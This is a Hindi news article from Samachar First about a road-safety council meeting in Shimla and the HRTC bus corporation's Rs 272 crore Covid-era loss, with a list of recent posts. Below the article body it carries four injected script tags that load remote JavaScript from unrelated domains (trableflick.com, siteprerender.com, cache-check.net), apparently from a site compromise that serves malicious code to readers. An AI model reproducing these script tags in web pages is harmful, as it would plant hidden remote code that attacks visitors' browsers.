Categories: हिमाचल

कोरोना काल में HRTC को 272 करोड़ का हुआ नुकसान, पड़ोसी राज्यों के लिए जल्द शुरू होगी बस सेवाएं

<p>परिवहन मंत्री विक्रम सिंह ठाकुर की अध्यक्षता में शिमला में राज्य विकास परिवहन और सड़क सुरक्षा परिषद की बैठक आयोजित की गई। इस बैठक में सड़क सुरक्षा को और अधिक प्रभावी बनाने पर परिवहन विभाग के अधिकारियों के साथ चर्चा हुई। बैठक में कहा गया कि प्रदेश में सालाना 1200 के करीब लोगों को सड़क हादसों में अपनी जान गवांनी पड़ती है। हालांकि पिछले एक-दो सालों में सड़क हादसों में जान गवांने वाले लोगों के आंकड़ों में कमी आई है। सरकार सड़क सुरक्षा को लेकर बेहद गंभीर है। इसी कड़ी में राज्य विकास परिवहन और सड़क सुरक्षा परिषद की आज शिमला में दूसरी बैठक हुई।</p>

<p>बैठक संपन्न होने के बाद मीडिया से बातचीत में परिवहन मंत्री विक्रम सिंह ठाकुर ने कहा कि सड़क सुरक्षा को और अधिक प्रभावी बनाया जाएगा। प्रदेश में सड़क हादसों को कम करने में सड़क सुरक्षा और जागरूकता का की अहम भूमिका निभा रहा है। ऐसे में लोगों को जागरूक करने और बस सफर को सुरक्षित बनाने के लिए कई और कदम उठाने की नितांत आवश्यकता है जिस पर विभाग और परिवहन निगम मिलकर काम कर रहा है।</p>

<p>विक्रम सिंह ठाकुर ने कहा कि करोना काल में पथ परिवहन निगम को आय में 82 फीसदी का नुकसान हुआ है। कोरोना काल के पांच महीनों के दौरान 272 करोड़ रुपए का शुद्ध नुकसान हिमाचल पथ परिवहन निगम को झेलना पड़ा। लोगों की सुविधा के लिए परिवहन निगम घाटे पर भी बसों को चलाने चला रही है प्रदेश में 50 फीसदी एचआरटीसी रूट्स घाटे पर चल रहे हैं। विक्रम सिंह ठाकुर ने कहा कि प्रदेश के अंदर भीतर करीब 1700 रूटों पर 100 फीसदी सीट के साथ बस चलाई जा रही हैं। बाहरी राज्यों के लिए भी 10 से 15 दिनों के भीतर बस सेवाएं बहाल की जाएगी। पड़ोसी राज्य हरियाणा पंजाब चंडीगढ़ और उत्तराखंड के लिए बस सेवाएं बहाल करने को पड़ोसी राज्यों से हरी झंडी मिल चुकी हैं। लेकिन दिल्ली के लिए बस सेवा पर अभी संशय बरकरार है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1602070158347″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

मुश्किल में हिमाचल की जनता: बिजली-पानी के बाद अब केंद्र ने की सस्ते राशन में कटौती

  Shimla: एक तरफ जहां हिमाचल में कांग्रेस सरकार बिजली की दरें बढ़ाकर और ग्रामीण…

3 hours ago

आज का राशिफल: 24 सितंबर 2024, जानें आपके लिए कैसा रहेगा मंगलवार

  मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज आपका दिन अच्छा…

4 hours ago

धर्मशाला में 29 से वन विभाग की राज्य स्तरीय स्पोर्ट्स और ड्यूटी मीट

  सांस्कृतिक कार्यक्रमों का भी होगा आयोजन Dharamshala: जिला मुख्यालय धर्मशाला में 25वीं स्टेट लेवल…

4 hours ago

ग्रीन एनर्जी प्रोजेक्ट में बड़ा घोटाला, विक्रम सिंह ठाकुर का बड़ा दावा

स्कैम की जांच करवाए, नहीं तो भाजपा करेगी बड़े आंदोलन का आगाज धर्मशाला। पूर्व उद्योग…

4 hours ago

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

19 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

19 hours ago